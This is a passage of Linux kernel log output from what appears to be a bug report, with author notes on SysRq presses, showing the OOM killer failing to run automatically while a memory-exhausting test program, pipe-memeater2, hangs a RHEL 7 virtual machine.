[  143.116515] Node 0 DMA per-cpu:
[  143.118718] CPU    0: hi:    0, btch:   1 usd:   0
[  143.121888] CPU    1: hi:    0, btch:   1 usd:   0
[  143.125057] CPU    2: hi:    0, btch:   1 usd:   0
[  143.128223] CPU    3: hi:    0, btch:   1 usd:   0
[  143.131423] Node 0 DMA32 per-cpu:
[  143.133751] CPU    0: hi:  186, btch:  31 usd:   0
[  143.136898] CPU    1: hi:  186, btch:  31 usd:   0
[  143.140448] CPU    2: hi:  186, btch:  31 usd:   0
[  143.141648] CPU    3: hi:  186, btch:  31 usd:   0
[  143.142848] active_anon:94430 inactive_anon:2419 isolated_anon:0
[  143.142848]  active_file:25 inactive_file:27 isolated_file:46
[  143.142848]  unevictable:0 dirty:25 writeback:0 unstable:0
[  143.142848]  free:13044 slab_reclaimable:5548 slab_unreclaimable:8850
[  143.142848]  mapped:856 shmem:2589 pagetables:5786 bounce:0
[  143.142848]  free_cma:0
[  143.150637] Node 0 DMA free:7568kB min:384kB low:480kB high:576kB active_anon:3188kB inactive_anon:112kB active_file:0kB inactive_file:24kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:16kB shmem:124kB slab_reclaimable:144kB slab_unreclaimable:300kB kernel_stack:16kB pagetables:248kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  143.160561] lowmem_reserve[]: 0 1802 1802 1802
[  143.161866] Node 0 DMA32 free:44608kB min:44668kB low:55832kB high:67000kB active_anon:374532kB inactive_anon:9564kB active_file:100kB inactive_file:84kB unevictable:0kB isolated(anon):0kB isolated(file):184kB present:2080640kB managed:1845300kB mlocked:0kB dirty:100kB writeback:0kB mapped:3408kB shmem:10232kB slab_reclaimable:22048kB slab_unreclaimable:35100kB kernel_stack:5296kB pagetables:22896kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  143.172186] lowmem_reserve[]: 0 0 0 0
[  143.172895] Node 0 DMA: 50*4kB (UM) 46*8kB (M) 30*16kB (M) 18*32kB (M) 11*64kB (UM) 5*128kB (UM) 0*256kB 1*512kB (U) 0*1024kB 2*2048kB (MR) 0*4096kB = 7576kB
[  143.175751] Node 0 DMA32: 3297*4kB (UEM) 1562*8kB (UEM) 647*16kB (UEM) 135*32kB (UEM) 4*64kB (UEM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44708kB
[  143.178506] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  143.180035] 2666 total pagecache pages
[  143.180639] 0 pages in swap cache
[  143.181175] Swap cache stats: add 0, delete 0, find 0/0
[  143.182004] Free swap  = 0kB
[  143.182471] Total swap = 0kB
[  143.185995] 524287 pages RAM
[  143.186492] 54799 pages reserved
[  143.187047] 527642 pages shared
[  143.187555] 453340 pages non-shared
( I pressed SysRq-f in order to invoke OOM killer, for OOM killer is not invoked automatically despite DMA32's free: is already below min: watermark. )
[  160.509185] SysRq : Manual OOM execution
[  160.512561] kworker/0:2 invoked oom-killer: gfp_mask=0xd0, order=0, oom_score_adj=0
[  160.517679] kworker/0:2 cpuset=/ mems_allowed=0
[  160.520700] CPU: 0 PID: 185 Comm: kworker/0:2 Not tainted 3.10.0-123.el7.x86_64 #1
[  160.525619] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[  160.532031] Workqueue: events moom_callback
[  160.533408]  ffff880036c24fa0 000000007dd3d9cb ffff880036dd1c70 ffffffff815e19ba
[  160.535875]  ffff880036dd1d00 ffffffff815dd02d ffff88005f108bf0 ffff88005f108bf0
[  160.538324]  ffff88007f674580 ffff88007f674ea8 ffff880036dd1d98 0000000000000046
[  160.540795] Call Trace:
[  160.541572]  [<ffffffff815e19ba>] dump_stack+0x19/0x1b
[  160.543176]  [<ffffffff815dd02d>] dump_header+0x8e/0x214
[  160.544824]  [<ffffffff8114520e>] oom_kill_process+0x24e/0x3b0
[  160.546618]  [<ffffffff81144d76>] ? find_lock_task_mm+0x56/0xc0
[  160.548444]  [<ffffffff8106af3e>] ? has_capability_noaudit+0x1e/0x30
[  160.550420]  [<ffffffff81145a36>] out_of_memory+0x4b6/0x4f0
[  160.552152]  [<ffffffff8137bc3d>] moom_callback+0x4d/0x50
[  160.553828]  [<ffffffff8107e02b>] process_one_work+0x17b/0x460
[  160.555643]  [<ffffffff8107edfb>] worker_thread+0x11b/0x400
[  160.557365]  [<ffffffff8107ece0>] ? rescuer_thread+0x400/0x400
[  160.559215]  [<ffffffff81085aef>] kthread+0xcf/0xe0
[  160.560758]  [<ffffffff81085a20>] ? kthread_create_on_node+0x140/0x140
[  160.562806]  [<ffffffff815f206c>] ret_from_fork+0x7c/0xb0
[  160.563824]  [<ffffffff81085a20>] ? kthread_create_on_node+0x140/0x140
[  160.564921] Mem-Info:
[  160.565325] Node 0 DMA per-cpu:
[  160.565860] CPU    0: hi:    0, btch:   1 usd:   0
[  160.566631] CPU    1: hi:    0, btch:   1 usd:   0
[  160.567617] CPU    2: hi:    0, btch:   1 usd:   0
[  160.568414] CPU    3: hi:    0, btch:   1 usd:   0
[  160.569198] Node 0 DMA32 per-cpu:
[  160.569771] CPU    0: hi:  186, btch:  31 usd:   0
[  160.570542] CPU    1: hi:  186, btch:  31 usd:   0
[  160.571392] CPU    2: hi:  186, btch:  31 usd:   0
[  160.572164] CPU    3: hi:  186, btch:  31 usd:   0
[  160.572948] active_anon:94430 inactive_anon:2419 isolated_anon:0
[  160.572948]  active_file:25 inactive_file:27 isolated_file:46
[  160.572948]  unevictable:0 dirty:25 writeback:0 unstable:0
[  160.572948]  free:13044 slab_reclaimable:5548 slab_unreclaimable:8850
[  160.572948]  mapped:856 shmem:2589 pagetables:5786 bounce:0
[  160.572948]  free_cma:0
[  160.578891] Node 0 DMA free:7568kB min:384kB low:480kB high:576kB active_anon:3188kB inactive_anon:112kB active_file:0kB inactive_file:24kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:16kB shmem:124kB slab_reclaimable:144kB slab_unreclaimable:300kB kernel_stack:16kB pagetables:248kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  160.585529] lowmem_reserve[]: 0 1802 1802 1802
[  160.586429] Node 0 DMA32 free:44608kB min:44668kB low:55832kB high:67000kB active_anon:374532kB inactive_anon:9564kB active_file:100kB inactive_file:84kB unevictable:0kB isolated(anon):0kB isolated(file):184kB present:2080640kB managed:1845300kB mlocked:0kB dirty:100kB writeback:0kB mapped:3408kB shmem:10232kB slab_reclaimable:22048kB slab_unreclaimable:35100kB kernel_stack:5296kB pagetables:22896kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  160.593312] lowmem_reserve[]: 0 0 0 0
[  160.594029] Node 0 DMA: 50*4kB (UM) 46*8kB (M) 30*16kB (M) 18*32kB (M) 11*64kB (UM) 5*128kB (UM) 0*256kB 1*512kB (U) 0*1024kB 2*2048kB (MR) 0*4096kB = 7576kB
[  160.596790] Node 0 DMA32: 3297*4kB (UEM) 1562*8kB (UEM) 647*16kB (UEM) 135*32kB (UEM) 4*64kB (UEM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44708kB
[  160.599652] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  160.601103] 2666 total pagecache pages
[  160.601703] 0 pages in swap cache
[  160.602691] Swap cache stats: add 0, delete 0, find 0/0
[  160.603580] Free swap  = 0kB
[  160.604072] Total swap = 0kB
[  160.607456] 524287 pages RAM
[  160.607980] 54799 pages reserved
[  160.608499] 527635 pages shared
[  160.609024] 453340 pages non-shared
[  160.609599] [ pid ]   uid  tgid total_vm      rss nr_ptes swapents oom_score_adj name
[  160.610967] [  572]     0   572     9232      522      19        0             0 systemd-journal
[  160.612373] [  591]     0   591    29620       80      25        0             0 lvmetad
[  160.613750] [  613]     0   613    11094      414      22        0         -1000 systemd-udevd
[  160.615158] [  707]     0   707    12803      102      24        0         -1000 auditd
[  160.616465] [  720]     0   720    20056       16       9        0             0 audispd
[  160.618066] [  729]     0   729     4189       43      13        0             0 alsactl
[  160.619369] [  730]     0   730     6551       49      18        0             0 sedispatch
[  160.620697] [  732]   172   732    41164       55      16        0             0 rtkit-daemon
[  160.622183] [  734]     0   734     6612       86      16        0             0 systemd-logind
[  160.623558] [  735]     0   735    61592      373      63        0             0 vmtoolsd
[  160.624863] [  739]     0   739    80894     4240      77        0             0 firewalld
[  160.626244] [  745]   995   745     2133       36       9        0             0 lsmd
[  160.627506] [  746]     0   746    96840      194      40        0             0 accounts-daemon
[  160.628884] [  747]     0   747    84088      287      66        0             0 ModemManager
[  160.630335] [  749]     0   749    32515      128      19        0             0 smartd
[  160.631591] [  752]   994   752    28961       92      28        0             0 chronyd
[  160.632883] [  756]     0   756    71323      513      39        0             0 rsyslogd
[  160.634400] [  757]     0   757    52615      443      53        0             0 abrtd
[  160.635671] [  759]     0   759    51993      340      54        0             0 abrt-watch-log
[  160.637062] [  760]    32   760    16227      131      35        0             0 rpcbind
[  160.638471] [  763]     0   763    51993      341      50        0             0 abrt-watch-log
[  160.639847] [  766]     0   766     1094       23       8        0             0 rngd
[  160.641159] [  768]     0   768     4829       78      14        0             0 irqbalance
[  160.642469] [  770]    81   770     7580      425      19        0          -900 dbus-daemon
[  160.643811] [  777]     0   777    50842      115      39        0             0 gssproxy
[  160.645177] [  807]    70   807     7549       77      20        0             0 avahi-daemon
[  160.646534] [  815]     0   815    28811       58      11        0             0 ksmtuned
[  160.647818] [  816]     0   816    26974       22      10        0             0 sleep
[  160.649127] [  817]   999   817   132837     2083      57        0             0 polkitd
[  160.650499] [  818]    70   818     7518       60      18        0             0 avahi-daemon
[  160.651906] [  880]     0   880   113613      994      74        0             0 NetworkManager
[  160.653405] [ 1077]     0  1077    13266      145      28        0             0 wpa_supplicant
[  160.654788] [ 1198]     0  1198    27631     3113      56        0             0 dhclient
[  160.656100] [ 1408]     0  1408   138261     2652      87        0             0 tuned
[  160.657411] [ 1409]     0  1409    20640      213      42        0         -1000 sshd
[  160.658661] [ 1416]     0  1416   138875     1130     141        0             0 libvirtd
[  160.659944] [ 1422]     0  1422    31583      150      18        0             0 crond
[  160.661296] [ 1423]     0  1423     6491       49      16        0             0 atd
[  160.662511] [ 1424]     0  1424   118308      759      51        0             0 gdm
[  160.663729] [ 1427]     0  1427    27509       31      11        0             0 agetty
[  160.665053] [ 2285]     0  2285    61020     4487     104        0             0 Xorg
[  160.666283] [ 2567]     0  2567    23306      253      44        0             0 master
[  160.667674] [ 2568]    89  2568    23332      252      45        0             0 pickup
[  160.669045] [ 2569]    89  2569    23349      251      45        0             0 qmgr
[  160.670312] [ 2580]     0  2580    64751      993      57        0          -900 abrt-dbus
[  160.671620] [ 2707]    99  2707     3888       48      11        0             0 dnsmasq
[  160.672985] [ 2708]     0  2708     3881       45      10        0             0 dnsmasq
[  160.674256] [ 2746]     0  2746    90874      322      61        0             0 upowerd
[  160.675546] [ 2770]   997  2770   101041      371      50        0             0 colord
[  160.676902] [ 2778]    42  2778   111507      299      75        0             0 pulseaudio
[  160.678231] [ 2791]     0  2791     4975       48      14        0             0 systemd-localed
[  160.679607] [ 2828]     0  2828   101278      258      47        0             0 packagekitd
[  160.681005] [ 2870]     0  2870    92702      783      45        0             0 udisksd
[  160.682294] [ 2913]     0  2913    80155      235      56        0          -900 realmd
[  160.683551] [ 2976]     0  2976    93324      821      70        0             0 gdm-session-wor
[  160.685488] [ 2992]  1000  2992    97458      200      40        0             0 gnome-keyring-d
[  160.687246] [ 3034]  1000  3034   162279      508     112        0             0 gnome-session
[  160.688795] [ 3041]  1000  3041     3488       36      10        0             0 dbus-launch
[  160.690170] [ 3042]  1000  3042     7460      298      17        0             0 dbus-daemon
[  160.691540] [ 3106]  1000  3106    76642      165      36        0             0 gvfsd
[  160.692986] [ 3110]  1000  3110    90285      685      44        0             0 gvfsd-fuse
[  160.694345] [ 3178]  1000  3178    13216      144      26        0             0 ssh-agent
[  160.695703] [ 3194]  1000  3194    84999      151      34        0             0 at-spi-bus-laun
[  160.697166] [ 3198]  1000  3198     7171      108      18        0             0 dbus-daemon
[  160.698535] [ 3201]  1000  3201    32423      159      32        0             0 at-spi2-registr
[  160.700025] [ 3213]  1000  3213   308215     2987     217        0             0 gnome-settings-
[  160.701605] [ 3230]  1000  3230   119864      373      93        0             0 pulseaudio
[  160.702984] [ 3236]     0  3236     9863       91      23        0             0 bluetoothd
[  160.704616] [ 3248]     0  3248     4972       49      13        0             0 systemd-hostnam
[  160.706041] [ 3250]  1000  3250   399482    27809     312        0             0 gnome-shell
[  160.707405] [ 3263]     0  3263    47748      273      47        0             0 cupsd
[  160.708758] [ 3287]  1000  3287   129195      382      96        0             0 gsd-printer
[  160.710124] [ 3317]  1000  3317   117500      523      49        0             0 ibus-daemon
[  160.711601] [ 3322]  1000  3322    98216      174      44        0             0 ibus-dconf
[  160.713041] [ 3324]  1000  3324   113063      487     104        0             0 ibus-x11
[  160.714394] [ 3329]  1000  3329   132651     1039      79        0             0 gnome-shell-cal
[  160.715891] [ 3337]  1000  3337    80472      397      57        0             0 mission-control
[  160.717428] [ 3341]  1000  3341   143879      597      92        0             0 caribou
[  160.718742] [ 3343]  1000  3343   178351     1094     144        0             0 goa-daemon
[  160.720151] [ 3358]  1000  3358    83626      372      90        0             0 goa-identity-se
[  160.721577] [ 3382]  1000  3382   100148      245      48        0             0 gvfs-udisks2-vo
[  160.723002] [ 3393]  1000  3393   105443      809      54        0             0 gvfs-afc-volume
[  160.724476] [ 3399]  1000  3399   167235      855     154        0             0 evolution-sourc
[  160.725990] [ 3406]  1000  3406    78121      167      37        0             0 gvfs-mtp-volume
[  160.727476] [ 3412]  1000  3412    74935      139      33        0             0 gvfs-goa-volume
[  160.728902] [ 3419]  1000  3419    80390      181      44        0             0 gvfs-gphoto2-vo
[  160.730326] [ 3435]  1000  3435   215425     2108     157        0             0 nautilus
[  160.731786] [ 3446]  1000  3446   182851     1697     136        0             0 tracker-extract
[  160.733214] [ 3447]  1000  3447    94351      915     125        0             0 vmtoolsd
[  160.734650] [ 3448]  1000  3448   117460      674      74        0             0 tracker-miner-a
[  160.736095] [ 3449]  1000  3449   117430      623      75        0             0 tracker-miner-u
[  160.737520] [ 3451]  1000  3451   140588     1248      82        0             0 tracker-miner-f
[  160.739047] [ 3460]  1000  3460   134177     1162      66        0             0 tracker-store
[  160.740605] [ 3462]  1000  3462   112871     1244     135        0             0 abrt-applet
[  160.741951] [ 3550]  1000  3550    37459      108      31        0             0 gconfd-2
[  160.743318] [ 3565]  1000  3565    79800      168      42        0             0 ibus-engine-sim
[  160.744710] [ 3587]  1000  3587   117863      187      47        0             0 gvfsd-trash
[  160.746059] [ 3624]  1000  3624   267938     9317     185        0             0 evolution-calen
[  160.747531] [ 3630]  1000  3630    59682      143      38        0             0 gvfsd-metadata
[  160.748929] [ 3649]  1000  3649   138689     1816     121        0             0 gnome-terminal-
[  160.750307] [ 3652]  1000  3652     2122       32       9        0             0 gnome-pty-helpe
[  160.751902] [ 3653]  1000  3653    29140      406      14        0             0 bash
[  160.753144] [ 3695]  1000  3695     1042       21       7        0             1 pipe-memeater2
[  160.754680] [ 3696]  1000  3696     1042       21       7        0             1 pipe-memeater2
[  160.756054] [ 3697]  1000  3697     1042       21       7        0             1 pipe-memeater2
[  160.757442] [ 3698]  1000  3698     1042       21       7        0             1 pipe-memeater2
[  160.758876] [ 3699]  1000  3699     1042       21       7        0             1 pipe-memeater2
[  160.760282] [ 3700]  1000  3700     1042       21       7        0             1 pipe-memeater2
[  160.761678] [ 3701]  1000  3701     1042       21       7        0             1 pipe-memeater2
[  160.763303] [ 3702]  1000  3702     1042       21       7        0             1 pipe-memeater2
[  160.764761] [ 3703]  1000  3703     1042       21       7        0             1 pipe-memeater2
[  160.766153] [ 3704]  1000  3704     1042       21       7        0             1 pipe-memeater2
[  160.767683] [ 3706]  1000  3706     1042       21       7        0             0 pipe-memeater2
[  160.769049] Out of memory: Kill process 3250 (gnome-shell) score 59 or sacrifice child
[  160.770424] Killed process 3317 (ibus-daemon) total-vm:470000kB, anon-rss:2092kB, file-rss:0kB
( I pressed SysRq-m in order to display memory information, for the system was still not responding. )
[  196.095694] SysRq : Show Memory
[  196.098000] Mem-Info:
[  196.099641] Node 0 DMA per-cpu:
[  196.101846] CPU    0: hi:    0, btch:   1 usd:   0
[  196.105035] CPU    1: hi:    0, btch:   1 usd:   0
[  196.109063] CPU    2: hi:    0, btch:   1 usd:   0
[  196.112459] CPU    3: hi:    0, btch:   1 usd:   0
[  196.115794] Node 0 DMA32 per-cpu:
[  196.118128] CPU    0: hi:  186, btch:  31 usd:   0
[  196.121276] CPU    1: hi:  186, btch:  31 usd:   0
[  196.124455] CPU    2: hi:  186, btch:  31 usd:   0
[  196.126846] CPU    3: hi:  186, btch:  31 usd:   0
[  196.128674] active_anon:94430 inactive_anon:2419 isolated_anon:0
[  196.128674]  active_file:25 inactive_file:27 isolated_file:46
[  196.128674]  unevictable:0 dirty:25 writeback:0 unstable:0
[  196.128674]  free:13046 slab_reclaimable:5548 slab_unreclaimable:8850
[  196.128674]  mapped:856 shmem:2589 pagetables:5786 bounce:0
[  196.128674]  free_cma:0
[  196.140606] Node 0 DMA free:7568kB min:384kB low:480kB high:576kB active_anon:3188kB inactive_anon:112kB active_file:0kB inactive_file:24kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:16kB shmem:124kB slab_reclaimable:144kB slab_unreclaimable:300kB kernel_stack:16kB pagetables:248kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  196.155788] lowmem_reserve[]: 0 1802 1802 1802
[  196.157371] Node 0 DMA32 free:44616kB min:44668kB low:55832kB high:67000kB active_anon:374532kB inactive_anon:9564kB active_file:100kB inactive_file:84kB unevictable:0kB isolated(anon):0kB isolated(file):184kB present:2080640kB managed:1845300kB mlocked:0kB dirty:100kB writeback:0kB mapped:3408kB shmem:10232kB slab_reclaimable:22048kB slab_unreclaimable:35100kB kernel_stack:5288kB pagetables:22896kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  196.164536] lowmem_reserve[]: 0 0 0 0
[  196.165466] Node 0 DMA: 50*4kB (UM) 46*8kB (M) 30*16kB (M) 18*32kB (M) 11*64kB (UM) 5*128kB (UM) 0*256kB 1*512kB (U) 0*1024kB 2*2048kB (MR) 0*4096kB = 7576kB
[  196.168336] Node 0 DMA32: 3297*4kB (UEM) 1564*8kB (UEM) 647*16kB (UEM) 135*32kB (UEM) 4*64kB (UEM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44724kB
[  196.171141] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  196.172490] 2666 total pagecache pages
[  196.173179] 0 pages in swap cache
[  196.173715] Swap cache stats: add 0, delete 0, find 0/0
[  196.174547] Free swap  = 0kB
[  196.175015] Total swap = 0kB
[  196.178556] 524287 pages RAM
[  196.179082] 54799 pages reserved
[  196.179605] 527628 pages shared
[  196.180114] 453338 pages non-shared
( I pressed SysRq-b in order to reboot the system, for OOM killer is not invoked automatically despite DMA32's free: is still below min: watermark. )
[  208.678839] SysRq : Resetting
---------- Example output of a hang up before OOM killer is invoked end ----------
---------- Example output of a hang up after OOM killer is invoked start ----------
( I pressed SysRq-m in order to display memory information before I start pipe-memeater2. )
[   75.434294] SysRq : Show Memory
[   75.436621] Mem-Info:
[   75.438188] Node 0 DMA per-cpu:
[   75.440491] CPU    0: hi:    0, btch:   1 usd:   0
[   75.443676] CPU    1: hi:    0, btch:   1 usd:   0
[   75.446920] CPU    2: hi:    0, btch:   1 usd:   0
[   75.450100] CPU    3: hi:    0, btch:   1 usd:   0
[   75.453282] Node 0 DMA32 per-cpu:
[   75.455657] CPU    0: hi:  186, btch:  31 usd: 149
[   75.458830] CPU    1: hi:  186, btch:  31 usd: 159
[   75.461469] CPU    2: hi:  186, btch:  31 usd: 139
[   75.462882] CPU    3: hi:  186, btch:  31 usd:  90
[   75.464299] active_anon:54015 inactive_anon:2094 isolated_anon:0
[   75.464299]  active_file:7055 inactive_file:58983 isolated_file:0
[   75.464299]  unevictable:0 dirty:8 writeback:0 unstable:0
[   75.464299]  free:311926 slab_reclaimable:6382 slab_unreclaimable:7573
[   75.464299]  mapped:21931 shmem:2263 pagetables:3993 bounce:0
[   75.464299]  free_cma:0
[   75.473555] Node 0 DMA free:9484kB min:384kB low:480kB high:576kB active_anon:2192kB inactive_anon:104kB active_file:160kB inactive_file:2540kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:672kB shmem:124kB slab_reclaimable:232kB slab_unreclaimable:456kB kernel_stack:56kB pagetables:108kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[   75.485351] lowmem_reserve[]: 0 1802 1802 1802
[   75.486883] Node 0 DMA32 free:1238220kB min:44668kB low:55832kB high:67000kB active_anon:213868kB inactive_anon:8272kB active_file:28060kB inactive_file:233392kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:32kB writeback:0kB mapped:87052kB shmem:8928kB slab_reclaimable:25296kB slab_unreclaimable:29836kB kernel_stack:4408kB pagetables:15864kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[   75.496482] lowmem_reserve[]: 0 0 0 0
[   75.497196] Node 0 DMA: 5*4kB (UM) 3*8kB (UE) 2*16kB (EM) 2*32kB (UM) 2*64kB (UM) 2*128kB (M) 3*256kB (UEM) 2*512kB (EM) 1*1024kB (E) 3*2048kB (EMR) 0*4096kB = 9484kB
[   75.500108] Node 0 DMA32: 141*4kB (UEM) 116*8kB (UEM) 39*16kB (UEM) 18*32kB (UEM) 10*64kB (M) 10*128kB (UM) 7*256kB (UM) 8*512kB (UM) 7*1024kB (EM) 4*2048kB (UEM) 296*4096kB (MR) = 1238276kB
[   75.503370] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   75.504729] 68301 total pagecache pages
[   75.505351] 0 pages in swap cache
[   75.505903] Swap cache stats: add 0, delete 0, find 0/0
[   75.506758] Free swap  = 0kB
[   75.507230] Total swap = 0kB
[   75.511170] 524287 pages RAM
[   75.511675] 54799 pages reserved
[   75.512203] 600924 pages shared
[   75.512738] 132132 pages non-shared
( I started pipe-memeater2 here. )
[   78.806223] pipe-memeater2 invoked oom-killer: gfp_mask=0x200d2, order=0, oom_score_adj=0
[   78.811173] pipe-memeater2 cpuset=/ mems_allowed=0
[   78.814287] CPU: 0 PID: 3088 Comm: pipe-memeater2 Not tainted 3.10.0-123.el7.x86_64 #1
[   78.818717] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   78.821857]  ffff88005f302d80 000000005d69c4df ffff88005f3ada78 ffffffff815e19ba
[   78.824265]  ffff88005f3adb08 ffffffff815dd02d ffffffff810b68f8 ffff8800666dde50
[   78.826634]  0000000000000206 ffff88005f302d80 ffff88005f3adaf0 ffffffff81102eff
[   78.829363] Call Trace:
[   78.830134]  [<ffffffff815e19ba>] dump_stack+0x19/0x1b
[   78.831676]  [<ffffffff815dd02d>] dump_header+0x8e/0x214
[   78.833289]  [<ffffffff810b68f8>] ? ktime_get_ts+0x48/0xe0
[   78.834899]  [<ffffffff81102eff>] ? delayacct_end+0x8f/0xb0
[   78.836528]  [<ffffffff8114520e>] oom_kill_process+0x24e/0x3b0
[   78.838236]  [<ffffffff81144d76>] ? find_lock_task_mm+0x56/0xc0
[   78.839990]  [<ffffffff8106af3e>] ? has_capability_noaudit+0x1e/0x30
[   78.841859]  [<ffffffff81145a36>] out_of_memory+0x4b6/0x4f0
[   78.843493]  [<ffffffff8114b579>] __alloc_pages_nodemask+0xa09/0xb10
[   78.845350]  [<ffffffff81188779>] alloc_pages_current+0xa9/0x170
[   78.847179]  [<ffffffff811b8954>] pipe_write+0x274/0x540
[   78.848826]  [<ffffffff811af36d>] do_sync_write+0x8d/0xd0
[   78.849928]  [<ffffffff811afb0d>] vfs_write+0xbd/0x1e0
[   78.850887]  [<ffffffff811b0558>] SyS_write+0x58/0xb0
[   78.851837]  [<ffffffff815f2119>] system_call_fastpath+0x16/0x1b
[   78.852928] Mem-Info:
[   78.853402] Node 0 DMA per-cpu:
[   78.854021] CPU    0: hi:    0, btch:   1 usd:   0
[   78.854911] CPU    1: hi:    0, btch:   1 usd:   0
[   78.855790] CPU    2: hi:    0, btch:   1 usd:   0
[   78.856674] CPU    3: hi:    0, btch:   1 usd:   0
[   78.857558] Node 0 DMA32 per-cpu:
[   78.858201] CPU    0: hi:  186, btch:  31 usd:  52
[   78.859080] CPU    1: hi:  186, btch:  31 usd: 165
[   78.859963] CPU    2: hi:  186, btch:  31 usd:  46
[   78.860848] CPU    3: hi:  186, btch:  31 usd: 182
[   78.861729] active_anon:54067 inactive_anon:2094 isolated_anon:0
[   78.861729]  active_file:15 inactive_file:114 isolated_file:0
[   78.861729]  unevictable:0 dirty:0 writeback:0 unstable:0
[   78.861729]  free:13039 slab_reclaimable:5278 slab_unreclaimable:7941
[   78.861729]  mapped:494 shmem:2263 pagetables:4022 bounce:0
[   78.861729]  free_cma:0
[   78.867365] Node 0 DMA free:7568kB min:384kB low:480kB high:576kB active_anon:2192kB inactive_anon:104kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:124kB slab_reclaimable:168kB slab_unreclaimable:440kB kernel_stack:56kB pagetables:108kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[   78.874584] lowmem_reserve[]: 0 1802 1802 1802
[   78.875538] Node 0 DMA32 free:44588kB min:44668kB low:55832kB high:67000kB active_anon:214076kB inactive_anon:8272kB active_file:60kB inactive_file:456kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:0kB writeback:0kB mapped:1976kB shmem:8928kB slab_reclaimable:20944kB slab_unreclaimable:31324kB kernel_stack:4472kB pagetables:15980kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:1254 all_unreclaimable? yes
[   78.883294] lowmem_reserve[]: 0 0 0 0
[   78.884105] Node 0 DMA: 62*4kB (M) 43*8kB (UM) 32*16kB (M) 20*32kB (M) 11*64kB (M) 6*128kB (UM) 3*256kB (UM) 3*512kB (UM) 0*1024kB 1*2048kB (R) 0*4096kB = 7568kB
[   78.887411] Node 0 DMA32: 1975*4kB (UEM) 1278*8kB (UEM) 550*16kB (UEM) 302*32kB (UEM) 61*64kB (UEM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44588kB
[   78.890582] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   78.892105] 2425 total pagecache pages
[   78.892799] 0 pages in swap cache
[   78.893421] Swap cache stats: add 0, delete 0, find 0/0
[   78.894381] Free swap  = 0kB
[   78.894915] Total swap = 0kB
[   78.898329] 524287 pages RAM
[   78.898950] 54799 pages reserved
[   78.899634] 527290 pages shared
[   78.900229] 453223 pages non-shared
[   78.900886] [ pid ]   uid  tgid total_vm      rss nr_ptes swapents oom_score_adj name
[   78.902341] [  574]     0   574     9231      503      19        0             0 systemd-journal
[   78.903948] [  590]     0   590    29620       80      26        0             0 lvmetad
[   78.905430] [  612]     0   612    10995      330      21        0         -1000 systemd-udevd
[   78.907001] [  704]     0   704    12797       95      23        0         -1000 auditd
[   78.908463] [  717]     0   717    20056       28       9        0             0 audispd
[   78.909981] [  726]     0   726     4189       43      13        0             0 alsactl
[   78.911463] [  728]     0   728    52615      443      55        0             0 abrtd
[   78.912905] [  729]     0   729     6600       78      17        0             0 systemd-logind
[   78.914821] [  730]     0   730     1094       25       8        0             0 rngd
[   78.916266] [  732]     0   732     6551       49      19        0             0 sedispatch
[   78.917787] [  733]     0   733    32515      129      19        0             0 smartd
[   78.919252] [  736]    81   736     7419      337      18        0          -900 dbus-daemon
[   78.920801] [  740]     0   740    51993      341      53        0             0 abrt-watch-log
[   78.922388] [  745]   995   745     2133       37       9        0             0 lsmd
[   78.923820] [  748]     0   748     4829       79      12        0             0 irqbalance
[   78.925388] [  750]     0   750    51993      340      51        0             0 abrt-watch-log
[   78.926943] [  757]     0   757    80894     4240      75        0             0 firewalld
[   78.928443] [  762]     0   762    61592      381      63        0             0 vmtoolsd
[   78.929964] [  763]     0   763    84088      285      64        0             0 ModemManager
[   78.931487] [  770]   172   770    41164       50      16        0             0 rtkit-daemon
[   78.933007] [  773]     0   773    96845      198      42        0             0 accounts-daemon
[   78.934618] [  780]     0   780    54939      449      38        0             0 rsyslogd
[   78.936113] [  781]    70   781     7549       75      21        0             0 avahi-daemon
[   78.937696] [  783]   994   783    28961       93      27        0             0 chronyd
